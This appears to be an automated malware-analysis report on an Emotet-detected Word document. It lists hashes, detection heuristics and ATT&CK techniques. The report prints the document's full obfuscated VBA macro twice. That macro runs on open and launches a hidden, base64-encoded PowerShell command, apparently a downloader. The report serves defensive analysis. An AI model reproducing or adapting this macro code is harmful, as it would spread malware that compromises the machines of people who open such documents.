Emotet Office (OLE) malware analysis — malicious · 0e9547de9d27606b

MALICIOUS

Office (OLE)

105.2 KB Created: 2018-06-01 15:24:00 Authoring application: Microsoft Office Word First seen: 2018-06-21

MD5: b5f4c7ef4f7cb1437f646d765004c861 SHA-1: 76227755b5c5c719dd915fcfa4b718801b043e38 SHA-256: 0e9547de9d27606b1ec925088957f3adcdacd30f8b068463fa4f3ef06d20ef4e

210 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'Autoopen' macro triggers a function that uses the 'Shell' command to execute a string. This string appears to be constructed to invoke PowerShell, likely for downloading and executing a secondary payload. The ClamAV detection explicitly names this as Emotet.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7076471-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7076471-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

vJoTVi = CSng(24059 * CInt(21349) + 42321 - 20765)
cQRHVjb = JMOpKNranZ + Shell(QNYNQias + Chr(vbKeyP) + nMzwGJi + XnEFnBOVwi + dwfks + AiOanIujQCX + UVLbYB, wEjAvTYmnH + vbHide + PdHtwWd)
wdvhzC = 59151 + Log(12880) - YZcIwO / Atn(29013) / RUbXNG / LBsrCN

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9910 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9910 bytes
SHA-256: `901bded496991dc0ada89bc7c5cb8cd6d589b177ec22cd172db4e48a926e8b12`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "PhFlrjYcnObvl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function cQRHVjb() On Error Resume Next SSJSv = 77174 + Log(21393) - HrVElF / Atn(90400) / HCRqz / rIjfTm WDpOsr = CSng(39508 * CInt(47463) + 22249 - 86224) WdzfzK = 39783 + Log(71442) - FbVpLN / Atn(70809) / AlQUYP / ojqtNa vJoTVi = CSng(24059 * CInt(21349) + 42321 - 20765) cQRHVjb = JMOpKNranZ + Shell(QNYNQias + Chr(vbKeyP) + nMzwGJi + XnEFnBOVwi + dwfks + AiOanIujQCX + UVLbYB, wEjAvTYmnH + vbHide + PdHtwWd) wdvhzC = 59151 + Log(12880) - YZcIwO / Atn(29013) / RUbXNG / LBsrCN PFmZlo = CSng(14156 * CInt(61915) + 76912 - 28071) End Function Sub Autoopen() On Error Resume Next jaWhf = 39856 + Log(14210) - VtBjK / Atn(72005) / PVwJm / jiJWW cajlj = CSng(24504 * CInt(31062) + 63795 - 62076) cQRHVjb iWYkj = 84190 + Log(92247) - WboOY / Atn(72642) / ibDzsM / Iwism VWuEq = CSng(11940 * CInt(83516) + 53948 - 71784) End Sub Attribute VB_Name = "UomwAvk" Function nMzwGJi() On Error Resume Next KwzTia = 28712 + Log(33682) - LQpujh / Atn(20412) / jzWsd / QRipIo XHWiqE = CSng(1805 * CInt(13241) + 43633 - 1292) HEsYiU = "owe" + "rsHeLL -" + "e SQBOAH" + "YAb" + "wBLAG" uFMvT = 46289 + Log(77046) - jQZPXj / Atn(64144) / jCDlG / vnISPp JEKwIz = CSng(44712 * CInt(41967) + 40527 - 95913) hkNAPmkaHwO = "UALQBFA" + "HgAUAByA" + "EUAcwBzAGkATwB" + "uACgAIABOA" + "EUAdwAt" + "AE8AYgBqAEUAQwB" + "UACAASQB" + "PAC4AQwB" + "vA" BVIUw = 85330 + Log(97962) - JoUESP / Atn(14050) / KZnAI / KWLPQO KuLEzj = CSng(71892 * CInt(39114) + 53026 - 78505) DKiQEjmbZHP = "G0AUABSAEUAcw" + "BzAGkAbwBOAC" + "4AZABFAGYA" + "bABhAFQA" + "ZQBTAHQAcgB" + "lAE" + "EAbQA" TUjnp = 99798 + Log(83417) - BfNwhw / Atn(96204) / KmIjc / IzuIzV VzikXh = CSng(76962 * CInt(34279) + 44686 - 62968) drXVb = "oAF" + "sAUwB5AFMA" + "dABFAG0ALgBJA" + "G8AL" + "gBNAEUA" + "TQBvAFIAeQBzAF" + "QAUgBFAGEAb" + "QBdACA" + "AWwBDAE" + "8ATgBWAEUAcgB" XjNGw = 95158 + Log(57777) - zfbiT / Atn(10545) / jLhthA / DfhiM PKlmF = CSng(93771 * CInt(22390) + 90926 - 43325) wwiUY = "0AF0AOgA6A" + "EYAcgBvAG0" + "AYgBh" + "AFMARQA2" + "ADQA" + "cwB0AFIAaQBuAG" + "cAKAAgACcAVAB" + "aAEYAaAB" + "hAD" + "kAcwB3A" CzisW = 600 + Log(89580) - Pijzc / Atn(70142) / zLBdhZ / lTspu cWtsNJ = CSng(59936 * CInt(92380) + 5974 - 15046) RkhLoN = "EUASQBhAC8A" + "RAAvAFkAZgB" + "SAEQAQwBWAG" + "oAQgB0AHA" + "AYgBkAGYAUgAxA" CkSPhb = 34627 + Log(64650) - IGlJR / Atn(78127) / jMKAhG / mtkqk FiwDC = CSng(51344 * CInt(94077) + 14090 - 6224) mLFKFkPJi = "FEAegBTAE" + "8AZ" + "wBRA" + "GEAM" + "gBtAHoARAA" + "3AFoA" + "SwBPAGY" + "AYgBBAGkASwA3AF" + "UAVwBXAHoAYgAy" + "AE4AVQAwAFcAOAB" saHtf = 43385 + Log(71665) - bYhvjs / Atn(14770) / wifVw / hOvaJh qrVjI = CSng(35632 * CInt(50172) + 48946 - 25048) twdFALki = "0ADkAMwA1ADIA" + "NQBzAGgAcg" + "BQAHYANQBPAGYA" + "dQAzAHQATQBGA" + "HYAdABPA" + "DUANwBuAEwAM" + "gBpAFIAMAB" + "KADcA" + "bgBuAEUAT" + "ABZADgA" QHAPLl = 19196 + Log(96267) - wkdRc / Atn(64130) / HsszF / EckjM bZhsj = CSng(9011 * CInt(28278) + 26783 - 91916) qMqfRRRQr = "RQBmAHgAbgBXAD" + "YAQw" + "A3AFIAZgBs" + "AHIARAB3AD" + "QAZwBEAEQAMQB" + "tAHIAZgBWADU" + "AWABjAGYARAA0AC" + "sASQBDADQ" VdlcF = 70806 + Log(44422) - ZszBL / Atn(64604) / PVDDXf / ZvWiOr NNTLmW = CSng(29002 * CInt(21740) + 54838 - 13363) kistNSKuMU = "AUgBCAHgAWgA" + "vAGsATAA4" + "AHMATwA1" + "AFoAUwBqAGUASQB" + "oAGkA" + "egBkA" nMzwGJi = HEsYiU + hkNAPmkaHwO + DKiQEjmbZHP + drXVb + wwiUY + RkhLoN + mLFKFkPJi + twdFALki + qMqfRRRQr + kistNSKuMU End Function Function XnEFnBOVwi() On Error Resume Next FWHTP = 49251 + Log(28361) - MTjLKX / Atn(80507) / EqFbWf / MffqY REswk = CSng(34923 * CInt(16290) + 46084 - 12104) EwsMjZ = "GQAVwBBAHIATwB" + "iAE0AZwA1ADM" + "AYQBaAGwA" + "TQA" + "1ADYAaQBJAE4A" zPOfad = 4675 + Log(17828) - wjKUWf / Atn(94654) / Dunji / puPqOZ hSzKI = CSng(23924 * CInt(14396) + 1428 - 86553) tXISWP = "WgBlAG8AMg" + "BaAHc" + "AWgArAGUAM" + "AB0AHMA" cWDciG = 68964 + Log(42383) - nsEdS / Atn(92609) / ZZkKm / jhONMJ SpZKM = CSng(20482 * CInt(25128) + 60078 - 25133) WaTsNLd = "dABpAEoA" + "TgAzACs" + "AQgB5" + "AHoAMAA0AHYAVA" + "BrADcATwB6" + "AE0AQQA2AHU" + "AeABzAGsAQ" nfUwm = 25884 + Log(55418) - fOumiQ / Atn(66156) / pnWNQt / IwzTtR jiMOz = CSng(59647 * CInt(34328) + 82682 - 94101) oKCTuiIURhf = "wBJ" + "AGMASABm" + "AHY" + "AaQB" + "rAEEAbQBrAHUARg" mYhvS = 61273 + Log(14772) - cQVaJ / Atn(98531) / tFMwpu / YXfLaT DiwqC = CSng(53409 * CInt(85670) + 23517 - 59413) fLifjrG = "BSAGMAb" + "ABJAG0ANg" + "BPAHYAcQBT" + "AHYAcA" + "BTADMAVgB4AGY" + "AMwA2A" + "E4ANABTADMAOQ" + "BHAC8" + "AVQBrA" + "GcAVwBxAG" SpJRBm = 17476 + Log(49719) - UDZFs / Atn(14993) / CAKPH / oqZmX HXBhaX = CSng(60336 * CInt(98801) + 70325 - 34435) sXvMlji = "oAdQA2AEgATwBO" + "ADgANQA" + "yAEcAQgBMAD" + "MAYQAxADUATQB6A" + "EoAZQBwAEcA" + "aABWA" + "DQAMABCA" kWlNw = 29355 + Log(57558) - FicYs / Atn(3535) / iNBTs / OZSpT wiNIp = CSng(71223 * CInt(55853) + 49008 - 86609) TwqDOn = "GQAVQBwA" + "FYAdQBSADgAdABK" + "ADU" + "AUwAyA" + "E0AKwBRADIAd" + "QAx" spbvN = 35213 + Log(2994) - wIfLpR / Atn(95965) / ZIWzT / ftfqr nnPcW = CSng(24293 * CInt(40501) + 22768 - 85317) flauDM = "AEsA" + "UwBRAFcAVg" + "BnADMARwBhAFoA" + "cgBNAH" + "oAbABOADAAdgBs" XnEFnBOVwi = EwsMjZ + tXISWP + WaTsNLd + oKCTuiIURhf + fLifjrG + sXvMlji + TwqDOn + flauDM End Function Function dwfks() On Error Resume Next BwXorK = 81825 + Log(75910) - vKXLUD / Atn(91786) / UKhQW / brKtDp wmYcGZ = CSng(49350 * CInt(59210) + 61896 - 40138) WjwjlwNz = "ADI" + "AcAAwAFQ" + "AO" + "ABOAGwAUQBXAG" + "cA" + "QQBkAG" + "MARQBTAG0" + "AagBW" + "ADkANAAvAEoAWg" + "BIAEcATABSADE" rzwPP = 54901 + Log(89384) - aKABK / Atn(63310) / WwzjQn / QwYziO WXopfY = CSng(48206 * CInt(57490) + 23547 - 53160) UfQvdLPki = "AKwBuADcALwA4AH" + "YAWAA2" + "AEcAbgA" + "wAGYAT" + "AA4" + "AHIAMgBTADAASgA" + "1AHcAVwA" ziOSwk = 27588 + Log(92147) - DdhzEP / Atn(86923) / wqQujv / mLLiI sjVwR = CSng(17476 * CInt(69312) + 96656 - 3141) zjDknLPCCE = "xAE0ATQBPADMAV" + "wBiAF" + "IAMwBVADMAZ" + "ABoADIAMAAvAFcA" + "QwBqAFQ" + "AcABuAFEAZw" kmmasp = 78752 + Log(71988) - frfVL / Atn(77221) / iJflY / nVLtMB GJiwDf = CSng(14695 * CInt(87623) + 40746 - 23274) SKXhY = "Ar" + "AEkA" + "ag" + "BqADgATwBrA" + "DQAbwBRAHU" + "AeQBmAG4" + "AUABaAF" WaOdNM = 27833 + Log(19426) - waaSQ / Atn(29343) / zQOwd / zJWJjS jZNzjP = CSng(96256 * CInt(39441) + 19177 - 15495) dhwij = "AAQwA5AEwAW" + "gAxAGoARQArAEE" + "AK" + "wBPADcALwA3AHUA" + "SQBp" + "AFkARQBsADYAU" + "gA5AFMAM" fCrnjj = 31308 + Log(62256) - dIcGNS / Atn(67651) / EHEcwi / ZMcjAR pIPTbv = CSng(22038 * CInt(57550) + 74963 - 86142) JIIsr = "AB1" + "AHgAbQB" + "MAEsAc" + "QBlAC8AR" dwfks = WjwjlwNz + UfQvdLPki + zjDknLPCCE + SKXhY + dhwij + JIIsr End Function Function AiOanIujQCX() On Error Resume Next iCYwH = 69686 + Log(31115) - WPCDWj / Atn(46136) / OTGjf / wTUqu oQaULZ = CSng(34403 * CInt(53800) + 10290 - 55487) DGrGlVBEBD = "QBpADAAT" + "gAzAEs" + "ATQBPAGQAW" + "gBmADQAS" + "ABoAEgAdABy" sTUuR = 74198 + Log(10327) - jDjzKj / Atn(23200) / HFEcQ / YsGoir RwJlOO = CSng(25704 * CInt(21367) + 53844 - 60476) svTzM = "AGQAbgBqAFkA" + "bABCACsATQA2AG0" + "ALwBzAHkAKw" + "A2A" OzKnHS = 32068 + Log(77173) - CKWAAo / Atn(4457) / cocEOw / HXLvR MfZXNS = CSng(60123 * CInt(72060) + 70517 - 76408) SznOMwQvKs = "HoAegB5AFUA" + "MQBXADIAcwBF" + "AHIASwBnAGY" + "AMwBkAFEAc" + "AB0ADUAcgBMAFo" + "AMAAwAEMARQB" uruHZ = 16499 + Log(70802) - MSinC / Atn(54524) / ArfkH / WBpiw nVXIrA = CSng(9234 * CInt(19917) + 43761 - 4744) FCRmFb = "4ADQAeAA2AGgA" + "Lw" + "BFAFIATgByA" + "GcAaAB5AFoAdQBh" + "AE8AcQB4AHA" + "AdQBYAFoASQBKAD" + "AAQgB0AEsAOQB" + "5AHQAZQBD" + "AFcA" + "WAA" iOaWF = 61001 + Log(57046) - XvMSnF / Atn(1023) / DXqEcc / zDpKqn RiwjzV = CSng(61595 * CInt(97694) + 32922 - 41378) WjZsoU = "yAEgA" + "YwBkAEgA" + "NAB3" + "AEcAV" + "QArAHcAU" + "ABoADkA" + "OAA9ACcAK" + "QAsACAAWwBTAHk" + "AcwB" + "0AEUATQAu" mZhaD = 68478 + Log(6331) - TBmjwi / Atn(11328) / dSQVmE / diTHI AEGUsq = CSng(5300 * CInt(97393) + 44320 - 99891) qqDlIDrZY = "AG" + "kA" + "bwAuAGMAT" + "wBtAFAAUg" + "BlAFMA" + "UwBpAE8ATgA" + "uAEMAbwBtAFAAc" + "gBFAHM" GzTwf = 94959 + Log(432) - rmCjBz / Atn(49070) / ADrkcv / SzjMG DkGSKO = CSng(75221 * CInt(69864) + 55934 - 96830) LIBrmtBNHu = "AUwBJAG8ATg" + "BtAE8ARABlAF0AO" + "gA6A" + "EQARQBj" + "AG" + "8ATQBQA" + "FI" + "ARQBTAFM" TJQswX = 10480 + Log(39874) - HCvfP / Atn(56202) / nAwwl / EoCwOq mzXFGQ = CSng(35900 * CInt(58920) + 37463 - 40242) aDoTI = "AKQAgAHw" + "ARgBPAH" + "IAZQBhAEMAS" + "AAtAG8AQg" + "BqAEUAYwB0" arnkA = 79293 + Log(52440) - hDzji / Atn(98934) / ZEcqBJ / jjJip zKjUj = CSng(48306 * CInt(46229) + 88457 - 12839) NFqGUtNujC = "ACAAewAgAE4AR" + "QB3AC0AT" + "wBiAGoA" + "RQBDAFQ" + "AIABp" + "AE8ALgBzAFQAc" + "gBlAGEAb" + "QBSAGUAQQBk" + "AEUAUg" + "AoACQ" AiOanIujQCX = DGrGlVBEBD + svTzM + SznOMwQvKs + FCRmFb + WjZsoU + qqDlIDrZY + LIBrmtBNHu + aDoTI + NFqGUtNujC End Function Function UVLbYB() On Error Resume Next nMVLJ = 64829 + Log(74660) - tFGrN / Atn(4986) / TQLHHa / zDDWW DFbFSk = CSng(77682 * CInt(56591) + 62677 - 95626) Xwirfi = "AXwAgACwAWwBz" + "AHkAUwB" + "UAEUAbQ" + "AuAFQARQBYAF" + "QALgBlAG4AYw" + "BPAEQASQ" + "BOA" Ctvlj = 33385 + Log(14638) - iqMIMm / Atn(98703) / RNSImL / LniBY OzmSGF = CSng(26964 * CInt(60541) + 69142 - 29785) PowEw = "GcAXQA6ADo" + "AQQBTAEMAaQBpAC" + "AA" + "KQAgAH0A" vZroqw = 29520 + Log(37423) - rWPOp / Atn(36406) / mjwFQi / QraqF lNhwjM = CSng(24642 * CInt(37546) + 36111 - 40200) SAoTarwrj = "IAApAC4AUgBlA" + "GEAR" + "ABUAG8ARQBuAEQ" + "AKAAgACkA" UVLbYB = Xwirfi + PowEw + SAoTarwrj End Function

SHA-256: 901bded496991dc0ada89bc7c5cb8cd6d589b177ec22cd172db4e48a926e8b12

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "PhFlrjYcnObvl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cQRHVjb()
On Error Resume Next
SSJSv = 77174 + Log(21393) - HrVElF / Atn(90400) / HCRqz / rIjfTm
WDpOsr = CSng(39508 * CInt(47463) + 22249 - 86224)
WdzfzK = 39783 + Log(71442) - FbVpLN / Atn(70809) / AlQUYP / ojqtNa
vJoTVi = CSng(24059 * CInt(21349) + 42321 - 20765)
cQRHVjb = JMOpKNranZ + Shell(QNYNQias + Chr(vbKeyP) + nMzwGJi + XnEFnBOVwi + dwfks + AiOanIujQCX + UVLbYB, wEjAvTYmnH + vbHide + PdHtwWd)
wdvhzC = 59151 + Log(12880) - YZcIwO / Atn(29013) / RUbXNG / LBsrCN
PFmZlo = CSng(14156 * CInt(61915) + 76912 - 28071)
End Function
Sub Autoopen()
On Error Resume Next
jaWhf = 39856 + Log(14210) - VtBjK / Atn(72005) / PVwJm / jiJWW
cajlj = CSng(24504 * CInt(31062) + 63795 - 62076)
cQRHVjb
iWYkj = 84190 + Log(92247) - WboOY / Atn(72642) / ibDzsM / Iwism
VWuEq = CSng(11940 * CInt(83516) + 53948 - 71784)
End Sub


Attribute VB_Name = "UomwAvk"
Function nMzwGJi()
On Error Resume Next
KwzTia = 28712 + Log(33682) - LQpujh / Atn(20412) / jzWsd / QRipIo
XHWiqE = CSng(1805 * CInt(13241) + 43633 - 1292)
HEsYiU = "owe" + "rsHeLL -" + "e SQBOAH" + "YAb" + "wBLAG"
uFMvT = 46289 + Log(77046) - jQZPXj / Atn(64144) / jCDlG / vnISPp
JEKwIz = CSng(44712 * CInt(41967) + 40527 - 95913)
hkNAPmkaHwO = "UALQBFA" + "HgAUAByA" + "EUAcwBzAGkATwB" + "uACgAIABOA" + "EUAdwAt" + "AE8AYgBqAEUAQwB" + "UACAASQB" + "PAC4AQwB" + "vA"
BVIUw = 85330 + Log(97962) - JoUESP / Atn(14050) / KZnAI / KWLPQO
KuLEzj = CSng(71892 * CInt(39114) + 53026 - 78505)
DKiQEjmbZHP = "G0AUABSAEUAcw" + "BzAGkAbwBOAC" + "4AZABFAGYA" + "bABhAFQA" + "ZQBTAHQAcgB" + "lAE" + "EAbQA"
TUjnp = 99798 + Log(83417) - BfNwhw / Atn(96204) / KmIjc / IzuIzV
VzikXh = CSng(76962 * CInt(34279) + 44686 - 62968)
drXVb = "oAF" + "sAUwB5AFMA" + "dABFAG0ALgBJA" + "G8AL" + "gBNAEUA" + "TQBvAFIAeQBzAF" + "QAUgBFAGEAb" + "QBdACA" + "AWwBDAE" + "8ATgBWAEUAcgB"
XjNGw = 95158 + Log(57777) - zfbiT / Atn(10545) / jLhthA / DfhiM
PKlmF = CSng(93771 * CInt(22390) + 90926 - 43325)
wwiUY = "0AF0AOgA6A" + "EYAcgBvAG0" + "AYgBh" + "AFMARQA2" + "ADQA" + "cwB0AFIAaQBuAG" + "cAKAAgACcAVAB" + "aAEYAaAB" + "hAD" + "kAcwB3A"
CzisW = 600 + Log(89580) - Pijzc / Atn(70142) / zLBdhZ / lTspu
cWtsNJ = CSng(59936 * CInt(92380) + 5974 - 15046)
RkhLoN = "EUASQBhAC8A" + "RAAvAFkAZgB" + "SAEQAQwBWAG" + "oAQgB0AHA" + "AYgBkAGYAUgAxA"
CkSPhb = 34627 + Log(64650) - IGlJR / Atn(78127) / jMKAhG / mtkqk
FiwDC = CSng(51344 * CInt(94077) + 14090 - 6224)
mLFKFkPJi = "FEAegBTAE" + "8AZ" + "wBRA" + "GEAM" + "gBtAHoARAA" + "3AFoA" + "SwBPAGY" + "AYgBBAGkASwA3AF" + "UAVwBXAHoAYgAy" + "AE4AVQAwAFcAOAB"
saHtf = 43385 + Log(71665) - bYhvjs / Atn(14770) / wifVw / hOvaJh
qrVjI = CSng(35632 * CInt(50172) + 48946 - 25048)
twdFALki = "0ADkAMwA1ADIA" + "NQBzAGgAcg" + "BQAHYANQBPAGYA" + "dQAzAHQATQBGA" + "HYAdABPA" + "DUANwBuAEwAM" + "gBpAFIAMAB" + "KADcA" + "bgBuAEUAT" + "ABZADgA"
QHAPLl = 19196 + Log(96267) - wkdRc / Atn(64130) / HsszF / EckjM
bZhsj = CSng(9011 * CInt(28278) + 26783 - 91916)
qMqfRRRQr = "RQBmAHgAbgBXAD" + "YAQw" + "A3AFIAZgBs" + "AHIARAB3AD" + "QAZwBEAEQAMQB" + "tAHIAZgBWADU" + "AWABjAGYARAA0AC" + "sASQBDADQ"
VdlcF = 70806 + Log(44422) - ZszBL / Atn(64604) / PVDDXf / ZvWiOr
NNTLmW = CSng(29002 * CInt(21740) + 54838 - 13363)
kistNSKuMU = "AUgBCAHgAWgA" + "vAGsATAA4" + "AHMATwA1" + "AFoAUwBqAGUASQB" + "oAGkA" + "egBkA"
nMzwGJi = HEsYiU + hkNAPmkaHwO + DKiQEjmbZHP + drXVb + wwiUY + RkhLoN + mLFKFkPJi + twdFALki + qMqfRRRQr + kistNSKuMU
End Function
Function XnEFnBOVwi()
On Error Resume Next
FWHTP = 49251 + Log(28361) - MTjLKX / Atn(80507) / EqFbWf / MffqY
REswk = CSng(34923 * CInt(16290) + 46084 - 12104)
EwsMjZ = "GQAVwBBAHIATwB" + "iAE0AZwA1ADM" + "AYQBaAGwA" + "TQA" + "1ADYAaQBJAE4A"
zPOfad = 4675 + Log(17828) - wjKUWf / Atn(94654) / Dunji / puPqOZ
hSzKI = CSng(23924 * CInt(14396) + 1428 - 86553)
tXISWP = "WgBlAG8AMg" + "BaAHc" + "AWgArAGUAM" + "AB0AHMA"
cWDciG = 68964 + Log(42383) - nsEdS / Atn(92609) / ZZkKm / jhONMJ
SpZKM = CSng(20482 * CInt(25128) + 60078 - 25133)
WaTsNLd = "dABpAEoA" + "TgAzACs" + "AQgB5" + "AHoAMAA0AHYAVA" + "BrADcATwB6" + "AE0AQQA2AHU" + "AeABzAGsAQ"
nfUwm = 25884 + Log(55418) - fOumiQ / Atn(66156) / pnWNQt / IwzTtR
jiMOz = CSng(59647 * CInt(34328) + 82682 - 94101)
oKCTuiIURhf = "wBJ" + "AGMASABm" + "AHY" + "AaQB" + "rAEEAbQBrAHUARg"
mYhvS = 61273 + Log(14772) - cQVaJ / Atn(98531) / tFMwpu / YXfLaT
DiwqC = CSng(53409 * CInt(85670) + 23517 - 59413)
fLifjrG = "BSAGMAb" + "ABJAG0ANg" + "BPAHYAcQBT" + "AHYAcA" + "BTADMAVgB4AGY" + "AMwA2A" + "E4ANABTADMAOQ" + "BHAC8" + "AVQBrA" + "GcAVwBxAG"
SpJRBm = 17476 + Log(49719) - UDZFs / Atn(14993) / CAKPH / oqZmX
HXBhaX = CSng(60336 * CInt(98801) + 70325 - 34435)
sXvMlji = "oAdQA2AEgATwBO" + "ADgANQA" + "yAEcAQgBMAD" + "MAYQAxADUATQB6A" + "EoAZQBwAEcA" + "aABWA" + "DQAMABCA"
kWlNw = 29355 + Log(57558) - FicYs / Atn(3535) / iNBTs / OZSpT
wiNIp = CSng(71223 * CInt(55853) + 49008 - 86609)
TwqDOn = "GQAVQBwA" + "FYAdQBSADgAdABK" + "ADU" + "AUwAyA" + "E0AKwBRADIAd" + "QAx"
spbvN = 35213 + Log(2994) - wIfLpR / Atn(95965) / ZIWzT / ftfqr
nnPcW = CSng(24293 * CInt(40501) + 22768 - 85317)
flauDM = "AEsA" + "UwBRAFcAVg" + "BnADMARwBhAFoA" + "cgBNAH" + "oAbABOADAAdgBs"
XnEFnBOVwi = EwsMjZ + tXISWP + WaTsNLd + oKCTuiIURhf + fLifjrG + sXvMlji + TwqDOn + flauDM
End Function
Function dwfks()
On Error Resume Next
BwXorK = 81825 + Log(75910) - vKXLUD / Atn(91786) / UKhQW / brKtDp
wmYcGZ = CSng(49350 * CInt(59210) + 61896 - 40138)
WjwjlwNz = "ADI" + "AcAAwAFQ" + "AO" + "ABOAGwAUQBXAG" + "cA" + "QQBkAG" + "MARQBTAG0" + "AagBW" + "ADkANAAvAEoAWg" + "BIAEcATABSADE"
rzwPP = 54901 + Log(89384) - aKABK / Atn(63310) / WwzjQn / QwYziO
WXopfY = CSng(48206 * CInt(57490) + 23547 - 53160)
UfQvdLPki = "AKwBuADcALwA4AH" + "YAWAA2" + "AEcAbgA" + "wAGYAT" + "AA4" + "AHIAMgBTADAASgA" + "1AHcAVwA"
ziOSwk = 27588 + Log(92147) - DdhzEP / Atn(86923) / wqQujv / mLLiI
sjVwR = CSng(17476 * CInt(69312) + 96656 - 3141)
zjDknLPCCE = "xAE0ATQBPADMAV" + "wBiAF" + "IAMwBVADMAZ" + "ABoADIAMAAvAFcA" + "QwBqAFQ" + "AcABuAFEAZw"
kmmasp = 78752 + Log(71988) - frfVL / Atn(77221) / iJflY / nVLtMB
GJiwDf = CSng(14695 * CInt(87623) + 40746 - 23274)
SKXhY = "Ar" + "AEkA" + "ag" + "BqADgATwBrA" + "DQAbwBRAHU" + "AeQBmAG4" + "AUABaAF"
WaOdNM = 27833 + Log(19426) - waaSQ / Atn(29343) / zQOwd / zJWJjS
jZNzjP = CSng(96256 * CInt(39441) + 19177 - 15495)
dhwij = "AAQwA5AEwAW" + "gAxAGoARQArAEE" + "AK" + "wBPADcALwA3AHUA" + "SQBp" + "AFkARQBsADYAU" + "gA5AFMAM"
fCrnjj = 31308 + Log(62256) - dIcGNS / Atn(67651) / EHEcwi / ZMcjAR
pIPTbv = CSng(22038 * CInt(57550) + 74963 - 86142)
JIIsr = "AB1" + "AHgAbQB" + "MAEsAc" + "QBlAC8AR"
dwfks = WjwjlwNz + UfQvdLPki + zjDknLPCCE + SKXhY + dhwij + JIIsr
End Function
Function AiOanIujQCX()
On Error Resume Next
iCYwH = 69686 + Log(31115) - WPCDWj / Atn(46136) / OTGjf / wTUqu
oQaULZ = CSng(34403 * CInt(53800) + 10290 - 55487)
DGrGlVBEBD = "QBpADAAT" + "gAzAEs" + "ATQBPAGQAW" + "gBmADQAS" + "ABoAEgAdABy"
sTUuR = 74198 + Log(10327) - jDjzKj / Atn(23200) / HFEcQ / YsGoir
RwJlOO = CSng(25704 * CInt(21367) + 53844 - 60476)
svTzM = "AGQAbgBqAFkA" + "bABCACsATQA2AG0" + "ALwBzAHkAKw" + "A2A"
OzKnHS = 32068 + Log(77173) - CKWAAo / Atn(4457) / cocEOw / HXLvR
MfZXNS = CSng(60123 * CInt(72060) + 70517 - 76408)
SznOMwQvKs = "HoAegB5AFUA" + "MQBXADIAcwBF" + "AHIASwBnAGY" + "AMwBkAFEAc" + "AB0ADUAcgBMAFo" + "AMAAwAEMARQB"
uruHZ = 16499 + Log(70802) - MSinC / Atn(54524) / ArfkH / WBpiw
nVXIrA = CSng(9234 * CInt(19917) + 43761 - 4744)
FCRmFb = "4ADQAeAA2AGgA" + "Lw" + "BFAFIATgByA" + "GcAaAB5AFoAdQBh" + "AE8AcQB4AHA" + "AdQBYAFoASQBKAD" + "AAQgB0AEsAOQB" + "5AHQAZQBD" + "AFcA" + "WAA"
iOaWF = 61001 + Log(57046) - XvMSnF / Atn(1023) / DXqEcc / zDpKqn
RiwjzV = CSng(61595 * CInt(97694) + 32922 - 41378)
WjZsoU = "yAEgA" + "YwBkAEgA" + "NAB3" + "AEcAV" + "QArAHcAU" + "ABoADkA" + "OAA9ACcAK" + "QAsACAAWwBTAHk" + "AcwB" + "0AEUATQAu"
mZhaD = 68478 + Log(6331) - TBmjwi / Atn(11328) / dSQVmE / diTHI
AEGUsq = CSng(5300 * CInt(97393) + 44320 - 99891)
qqDlIDrZY = "AG" + "kA" + "bwAuAGMAT" + "wBtAFAAUg" + "BlAFMA" + "UwBpAE8ATgA" + "uAEMAbwBtAFAAc" + "gBFAHM"
GzTwf = 94959 + Log(432) - rmCjBz / Atn(49070) / ADrkcv / SzjMG
DkGSKO = CSng(75221 * CInt(69864) + 55934 - 96830)
LIBrmtBNHu = "AUwBJAG8ATg" + "BtAE8ARABlAF0AO" + "gA6A" + "EQARQBj" + "AG" + "8ATQBQA" + "FI" + "ARQBTAFM"
TJQswX = 10480 + Log(39874) - HCvfP / Atn(56202) / nAwwl / EoCwOq
mzXFGQ = CSng(35900 * CInt(58920) + 37463 - 40242)
aDoTI = "AKQAgAHw" + "ARgBPAH" + "IAZQBhAEMAS" + "AAtAG8AQg" + "BqAEUAYwB0"
arnkA = 79293 + Log(52440) - hDzji / Atn(98934) / ZEcqBJ / jjJip
zKjUj = CSng(48306 * CInt(46229) + 88457 - 12839)
NFqGUtNujC = "ACAAewAgAE4AR" + "QB3AC0AT" + "wBiAGoA" + "RQBDAFQ" + "AIABp" + "AE8ALgBzAFQAc" + "gBlAGEAb" + "QBSAGUAQQBk" + "AEUAUg" + "AoACQ"
AiOanIujQCX = DGrGlVBEBD + svTzM + SznOMwQvKs + FCRmFb + WjZsoU + qqDlIDrZY + LIBrmtBNHu + aDoTI + NFqGUtNujC
